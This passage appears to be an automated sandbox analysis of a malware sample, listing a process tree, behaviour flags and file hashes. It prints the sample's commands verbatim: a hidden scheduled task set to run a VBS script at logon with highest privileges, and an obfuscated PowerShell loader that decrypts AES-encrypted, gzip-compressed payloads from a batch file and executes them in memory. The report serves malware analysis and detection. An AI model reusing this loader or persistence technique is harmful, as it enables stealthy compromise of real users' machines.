- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_861_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_861.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "5⤵PID:4964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3560
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵PID:2556
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54c10a330054b4aa9a37f63a4053f87d8
SHA149617e69ea31bb85d2ee6f9fc142a11c6e416f4a
SHA25639b674c0a2727ac505dc12e1e9236b3646fe246efef25b1ae1036fd674246286
SHA512f9f4e16c1eb2d2ca2e6330f0e11770e491f829958e1ebdd4a6f8ddc748c7b07b167680a9c07499b9eda088bf69d99a48e20fac98f36bc5b4cda8195747e3df1b
-
Filesize
50KB
MD52143b379fed61ab5450bab1a751798ce
SHA132f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA5120bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
2KB
MD5690b700dfc96df64fefaa604eb5e9164
SHA12e4cce0a2781d5903e2bac1c912425a9dad2195d
SHA2569f32111b998a6bd796d09ec4495566e19f0db135bdd399abe4ec5f2508141d68
SHA51230ff89aa115f030d856b337c2507c9398ff17560fb3a6fe001cccc253f5a0514165b41b9bfaa0d37e3f8eaf05264c8ec9c54fbde18a7e683fd963059b17757b5
-
Filesize
2KB
MD5c548ed01ae645adff1598bd0dcfb16c7
SHA114c0583817bd5f62190f2e167dff7b1be066c173
SHA256f126e6f7c0898e5dfcda73ecdd6bd3205c6e9d416d9971e92a403d5bae47c4bb
SHA5121ba317543c77ba9c385370b6fbdefb3339a9b53db8b9b0ad5415ecd9261c9fbeb7d7efd2c4d1ddb7b50fde73e23c36284755bd604a0c9d339be2112ed3353a65
-
Filesize
2KB
MD556fd2bc3a8a94e679815a7ef8d9a6ee3
SHA160d4f84e04d5ed2050fa1ac06cdbc41471547d24
SHA25697fe24084be215a5171782c2addf9a00dcd15b97d269a330b8ac73375f726ef1
SHA5128a5b06ce81e0eaf385d3ec94561ae431e1f262b8733f7adc2141d74c59d63d02e74d45c35e7ffb1be1c4c999f5983465cc067ee1fedb964844302e5522c76041
-
Filesize
2KB
MD5c6fd07eb54759e15ea7f5f4dd9a82adf
SHA19aa483eea0adec5588c6e0b0f632d6b4f909bdeb
SHA256acb8c6d1373d893039d6fd4efe8d536708163ae3749b899be0e2f74c5876e216
SHA512179839e1758814ce0761abe81809552d7647cf58ea16e99b4952b16d44080a6389ba7722ebf18617b1c2c5d38b21b0b62e25ca81f9984aa21d28e00a9422120f
-
Filesize
1KB
MD502ff25a2b8922d643cfe94f681a12e7e
SHA17c7e4dbe073e6c67330d4c08586c987a687b4188
SHA2568bf6ebc47146467a46543124876c4b4cd2791c72b785d18ffe67c8b2d230e050
SHA5128caa6b3cc65aaf591e41f1dc746334a0a6ca904c32a98b7483870912172dbf131e49077cc6238cd436020125be85ca052cc2f69c3298f8972e37e8df51fee2fd
-
Filesize
1KB
MD56bd32908cca3ad2cf9607410f5ec2b99
SHA1e4776891be1e9b7bc1483b6c7ba11e42c6ab1efa
SHA25629d939da16fb198a4c7c5c11cb06033ad10c92c514de497585638b18fb7c1962
SHA512db0f2f0deef4c3bd248669001f22132c7ee896ad23132fbe3e68a674a7c100583551174a250eae0004cabdce9023561a0342eeca184a8807340c1ff131b918e3
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
274KB
MD5e19333732c953dccd21bd997320a7a53
SHA193462b009375d7bb5434843b871dc439c9b8555d
SHA2560556c1dcf0f0928084b9067e210e8b72c79dd02831b70a4f4e81c4e3298ff3d9
SHA512cde6e8475e5433d51a9f2fb2db3cbf46e86089392344da43e194c3da90005597a56140cd580a2c6edfbcde9a95618c1233160d1ff79d049efcbdad62ee06bdf3
-
Filesize
83KB
MD5fc1bd57fa57b7b5c512746c7de3fa19a
SHA17f794e6459def2dcc346d562aacca372e7282270
SHA2568977812b16f1e3d827cbce1675d9ad9e2f0370cf27cb3b23b389594739c3b837
SHA51271a1908e1625c9ef28c5a85ca21dfdadcebfc4ae41b21ba2d11a92e1192a49a819adde6fb30fb9f2e8f4199a264c56e86f9d21a67704f7b25b8dbdd9c43b07d9
-
Filesize
304KB
MD574f5686e51d07dab9f43f62081f83003
SHA18d6b22e17db345f43ec3db13748c162d3cd1b229
SHA25652974d82b405f9ebba25b6de26cbf2c59f4ec9e4d6c7059661f9f2f02e29d03e
SHA5125865a681a5e9b3464351a4d9e5bf18dccf3ed43f288c388decfa8559e496c67a563acadd8b7563e4004fe320298b47842a5a672552f14a95772460f54f782384
-
Filesize
124B
MD5a18bd6dc1b350c27c0b6b3b97280e05a
SHA15942904aba32ab36623722eb18017644755e1f02
SHA256ef73bc9d025e3d7672a6dee2164fc33f9a2337d8e1b992527c7cffef31604517
SHA512b84af565893f6bed5389df962a7fd262fa02c4bca09c89bd8708c8ce46aa1bb542d76daa5745ce435b79fc409da1cafd9ae1ff4e9f0ed35a2773bbae7ca58294
-
Filesize
112B
MD5915c576845b00de7b55928536eb8a5c5
SHA1d87a9df7bd6a3724f42726c8c09301680e319192
SHA256b6e404b9cd7d0692adee73269af4645190b4b40a7f4d38ba8184cf9eee9b314d
SHA512dd0c34e70f8565ee210349c27f787ebf5a9db09472a24020af4096c4f6955cdca9d42a353993158a291255aa0102f97ab85a766bd03e86bb23674573fc0f8334